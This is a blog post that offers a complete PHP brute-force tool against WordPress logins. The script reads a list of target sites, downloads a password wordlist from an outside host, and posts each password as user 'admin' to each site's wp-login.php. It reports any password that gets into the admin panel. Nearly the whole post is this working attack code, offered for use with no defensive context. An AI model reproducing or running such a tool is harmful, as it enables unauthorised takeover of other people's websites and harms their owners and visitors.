Wordpress Wp-admin Bruteforce
<?php
class wp
{
public $site;
public $password;
public $wordlist;
public $siteler;
public $regex = 'general.php';
public function wordlist() {
$liste = file_get_contents("http://afrikanhosting.com/images/wp.txt");
$this->wordlist = explode("\n",$liste);
return $this->wordlist;
}
public function curl($site,$password)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php");
curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1");
$calis = curl_exec($curl);
return $calis;
}
public function siteler($liste)
{
$site = file_get_contents($liste);
$this->siteler = explode("\n",$site); return $this->siteler;
}
public function burtay($liste)
{
$this->siteler($liste);
foreach($this->siteler as $sites)
{
$site = trim($sites);
echo "Denenen Site : " . $site . "\n";
foreach($this->wordlist() as $sifre)
{
$password = trim($sifre);
echo "Denenen Sifre " . $password . "\n";
if ( eregi ($this->regex,$this->curl($site,$password)) )
{
echo "-------------------------------------\n";
echo $site . " icin sifre kirildi sifre : " . $password . "\n" ;
echo "xxx\n";
echo "xxx\n";
echo "-------------------------------------\n";
break;
}
}
}
}
}
echo " ------------------ xxxxx || xxx || ------------------ \n\n ";
$class = new wp(); $class->burtay($argv[1]);
?>
Regards,
Hardeep Singh
(www.fb.com/h4rdeep)
Post a Comment Blogger Facebook